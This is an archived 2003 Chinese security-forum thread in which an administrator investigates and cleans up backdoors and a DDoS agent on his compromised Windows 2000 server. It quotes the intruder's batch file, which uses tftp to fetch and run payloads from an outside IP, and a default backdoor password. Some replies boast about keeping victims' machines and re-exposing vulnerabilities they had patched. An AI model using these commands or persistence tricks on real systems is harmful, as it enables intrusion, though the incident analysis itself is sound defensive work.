|
 | 作者: SysHu0teR [syshunter]
 版主 |
登录 |
| 2003年3月17日午时: 无意发现ADMIN密码被改,大惊,用fport看了下,发现hgzserver.exe,原来是个后门,杀了进程,删除后。 进到system32(因为某些小屁孩子就喜欢往ADMIN$传东西)。发现如下文件 ---------------------------------------------------------------------- C:\WINNT\system32>dir /od .... 2003-03-15 12:02 141 put.bat 2003-03-15 16:09 40,363 wins.dll 2003-03-15 16:09 33,305 winns.exe 2003-03-15 16:09 33,305 TInject.Dll 2003-03-15 16:09 100,864 wupdmgr32.exe 2003-03-15 16:09 5,936 srvsupp.exe 2003-03-15 16:09 102 autocrat_log.log 2003-03-17 14:13 19,968 wsock32s.dll 2003-03-17 14:13 27,648 wsock32l.dll 2003-03-17 14:13 18,432 wsock32p.dll 看下PUT.BAT: ---------------------------------------------------------- tftp -i 218.22.181.46 get wins.dll tftp -i 218.22.181.46 get winns.exe winns -run tftp -i 218.22.181.46 get server.exe server ----------------------------------------------------------- 通过以上,起码直接攻击源找到了,先不管他是不是肉鸡,总之可以证明对方是个新手,先传了WINNS想偷我的密码,我按照winns -run 猜测了下: ---------------------------------- C:\WINNT\system32>winns -stop Inject DLL Into Remote Process V1.3 By WinEggDrop The Service Is Not Running Currently C:\WINNT\system32> //瞧见了吧,这要怪我们的WinEggDrop (推卸责任) 至于这个SERVER.exe,我们来看看,autocrat_log.log: ------------------------------------------------------ 2003-3-15 16:09:10 - Autocrat DDoS Server 成功启动. 2003-3-15 16:09:21 - Autocrat DDoS Server 关闭. ------------------------------------------------------ 原来是个WIN下的DDos工具,入侵者还算仁慈。那个server.exe就是被控端。 好了,到此我们已经清楚了,接下来是善后工作: 先netstat -a看下目前端口: TCP server:4899 server:0 LISTENING TCP server:8535 server:0 LISTENING TCP server:8536 server:0 LISTENING TCP server:9966 server:0 LISTENING TCP server:20540 server:0 LISTENING 天啊~`,这么多,我低估了那个家伙#¥%%・¥%,8535是独裁者(就是那个DDOS工具),8536是独裁者调用的某某人现成的WINSHELL后门, telnet 127.0.0.1 8536 WINSHELL 5.0 LOGIN: 晕还是5.0的,用独裁者默认的密码autocrat,进去了,打个?出来些帮助,看看,原来删除就是打个r。WINSHELL删完了。 独裁者本身目前是删不掉了,按他的设计思路我只知道必须要重新启动别的系统来删除那几个文件。 接着看: ----------------------------------- telnet 127.0.0.1 9966 WinEggDrop Shell V1.39 By WinEggDrop Enter Password: ------------------------------------- 天啊,WinEggDrop,说老实话,我有点讨厌你了。 再看 ------------------------------------------------------- telnet 127.0.0.1 20540 ---[ T-Cmd v1.0 beta, by TOo2y ]--- ---[ E-mail: TOo2y@safechina.net ]--- ---[ HomePage: www.safechina.net ]--- ---[ Date: 02-05-2003 ]--- Escape Character is 'CTRL+]' Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. C:\WINNT\system32> --------------------------------------------------------- 晕~,还是用fport吧: ------------------------------------ D:\fport.exe 852 r_server -> 4899 TCP C:\WINNT\System32\r_server.exe 720 wupdmgr32 -> 8535 TCP C:\WINNT\System32\wupdmgr32.exe 364 svchost -> 9966 TCP C:\WINNT\system32\svchost.exe 104 ntkrnl -> 20540 TCP C:\WINNT\system32\ntkrnl.exe --------------------------------------------------------------------- 至此我已经没什么好说的了。・#¥・#¥ 先是r_server,先在注册表里查找r_server,在 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\radmm HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\radmm 先停掉系统服务里的radmm,删除他们,然后再删除r_server.exe wupdmgr32我刚才说了,暂时我没办法,等进98下再删, 然后是WinEggDrop Shell V1.39,该兄利用了进程插入的方法,由于插入到了svchost.exe,暂时也没办法手工弄,只有下载杀毒软件了。除非WinEggDrop本人能给个手工解决方案:( 下面到ntkrnl了,去系统服务里找到先停掉,然后删除ntkrnl.exe。 netstat结果目前就剩下 720 wupdmgr32 -> 8535 TCP C:\WINNT\System32\wupdmgr32.exe 364 svchost -> 9966 TCP C:\WINNT\system32\svchost.exe 这两个了,在系统暂时不能重起并让远程无法连接的情况下,只有在本地策略里禁掉这两个端口的所有连接了,(具体方法就不再罗嗦了)。 目前整个系统是乱七八糟,也懒得改ADMIN密码了。通过以上,根本不敢乱说现在系统就是绝对干净的了,看来只有重做了。 这次被入侵,我想说的是,某些非专业入侵者并不可怕,可怕的是提供给这些入侵者工具的家伙,初步估计我的系统是因为被某些上网好动分子在不经意间被人恶意利用并一步一步渗透了。在这里给所有系统管理员提个醒了。 一个倒霉的家伙:syshunter 2003.3.17.15:40 |
| 地主 发表时间: 03/17 15:49 |
 | 回复: ypy [ypy]  见习版主 |
登录 |
|
默哀ing...... |
| B1层 发表时间: 03/17 16:09 |
 | 回复: laievf [laievf]  论坛用户 |
登录 |
|
唉,被你这样的高手抓住…………………… |
| B2层 发表时间: 03/17 20:28 |
 | 回复: nightcolor [nightcolor] 版主 |
登录 |
|
所以我一向都拒绝任何人动我的服务器 包括我家里的人 |
| B3层 发表时间: 03/18 01:17 |
 | 回复: wjccn [wjccn]  论坛用户 |
登录 |
|
怎么这么难啊! 什么也看不懂! 还是回“菜鸟乐园”吧~~~~~~~~~~~~~~~~ |
| B4层 发表时间: 03/18 16:12 |
 | 回复: feiying [feiying]  论坛用户 |
登录 |
|
高手就是高手.... |
| B5层 发表时间: 04/15 17:33 |
 | 回复: yyh [yyh] 论坛用户 |
登录 |
|
叼 |
| B6层 发表时间: 04/15 17:51 |
| 回复: bking [bking]  版主 |
登录 |
|
看来那个入侵者只是想试试身手,并无恶意。理解理解,呵呵 |
| B7层 发表时间: 04/15 19:14 |
| 回复: agl [agl] 论坛用户 |
登录 |
|
晕~! 动用了这么多流行的后门技术,看来是一个活动频繁赶时髦的家伙. 这样的点击形黑客有什么乐趣呢?我是想不通, 坦白讲我对后门还 真不太了解,从来没想过要做.那么做就失去网络安全的乐趣了. |
| B8层 发表时间: 04/15 19:52 |
 | 回复: ma2751_cn [ma2751_cn]  |
登录 |
|
云边月 : 我想你那个拥有3G内存的肉鸡你也不是很想拥有吗/那不就要留个后门方便进入/ 我以前也是喜欢这样搞,你删了这个还有那个,除非你全部删除,后来才发觉没什么大用处,人家重装就什么都没有了。 现在我的后门方式是为系统制造漏洞。我现在唯一的一台肉鸡就是这样搞的,对方已经修补了3389输入发漏洞(删除帮助文件)我就帮它下载回来,运用社会工程学,对方对已经修补的漏洞是不会去防范的。 |
| B9层 发表时间: 04/17 23:07 |
| 回复: agl [agl] 论坛用户 |
登录 |
|
TO风一样的男子: 呵呵,你倒挺会阿~!我一般都不留后门,还想尽办法让管理员知道, 那个3G内存的工作站是想做代理,结果还是没敢做。那可是大庆石油管理 局主页啊~!我还想在岗工作几年。现在不用代理改用网关了,速度还行 一般都能保持下行1.2M左右,上行没算过。 肉鸡只用于入侵下一个目标而留,寿命不会太长。这样也有好处,不 会有人查到我,因为我总变啊~! |
| B10层 发表时间: 04/18 01:56 |
 | 回复: wineggdrop [wineggdrop] 论坛用户 |
登录 |
|
WinEggDropShell删除方法: 1.将那个服务改为手动 2.重启系统 3.将服务删除并将相关文件删除。 |
| B11层 发表时间: 04/18 16:56 |
| 回复: wineggdrop [wineggdrop] 论坛用户 |
登录 |
|
删除那个独裁者ddos的东西 sc stop msupdate sc delete msupdate sc stop "service support" sc delete "service support" 杀了wupdmgr32进程 恢复exe关联,恢复关联可以利用wineggdropshell后门的一个 功能,呵呵,不过你得在自己的系统上装wineggdropshell ,有时间我会写个恢复常见关联的单独程序。 |
| B12层 发表时间: 04/18 17:02 |
| 回复: ma2751_cn [ma2751_cn] |
登录 |
|
TO 云边月: 入侵后所做的事情: 1 制作代理服务器,做跳板。 2 运用肉鸡做不敢在自己机器上的事情。 3 在肉鸡上跟管理员做‘抓贼’游戏,从而提高自己的网络攻防技术。(我看你想尽办法让管理员知道就是这个意思吧) 4 格式化,给对方造成损失。(太狠了!) 而我的肉鸡很少用来做跳板的,我在外打工,网吧用的是98机子,所以一部稳定,长时间在线的2K肉鸡对我十分的重要,用终端连接在上面做我想研究的东西,把所学的在上面做实验,比如帮它配置IIS之类的,如果有新的漏洞公布,我才用它试试入侵,但不会留后门。 风一样的男子/2003/04/19 [此贴被 风一样的男子(ma2751_cn) 在 04月19日21时55分 编辑过] |
| B13层 发表时间: 04/19 20:04 |
| 回复: wineggdrop [wineggdrop] 论坛用户 |
登录 |
|
后门的形式不是单单在上面执行后门程序的,留下一个admin权限的用户或知道管理员帐户密码等也是留下后门的一种形式。 |
| B14层 发表时间: 04/20 07:21 |
| 回复: ancdut [ancdut] 论坛用户 |
登录 |
|
呵呵~~~BOSS级的人物还这样呀/// |
| B15层 发表时间: 04/26 18:45 |
 | 回复: xxzjmcdyt [xxzjmcdyt] 论坛用户 |
登录 |
|
除了崇拜 我无话可说! |
| B16层 发表时间: 08/09 10:35 |
| 回复: hacker521 [hacker521] 论坛用户 |
登录 |
|
为那些被入侵的朋友们默哀3分钟,这就是后果呀,所以家中电脑出了会用电脑的老爸用过外,我从不让别人用 |
| B17层 发表时间: 08/10 07:20 |
 | 回复: burningice [burningice] 论坛用户 |
登录 |
|
我也想要这样的经历,爽 |
| B18层 发表时间: 08/10 17:42 |
| 回复: xiaoht [xiaoht] 论坛用户 |
登录 |
|
悲哀的很,我不让别人用那怕是我很好的朋友,有些小的错误或许句会带来遗憾的哦 |
| B19层 发表时间: 08/19 16:09 |
| 回复: yimarong [yimarong] 版主 |
登录 |
|
整个一个工具依赖者! |
| B20层 发表时间: 09/03 22:59 |
| 回复: hl82 [hl82] 论坛用户 |
登录 |
|
熟练运用也不错呀 ,不然要Windows干吗呀! |
| B21层 发表时间: 09/30 21:22 |
 | 回复: realpope [realpope] 论坛用户 |
登录 |
|
最崇拜的还是那些自己写工具 编程序进行攻击的黑客 |
| B22层 发表时间: 10/13 12:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 一次倒霉的经历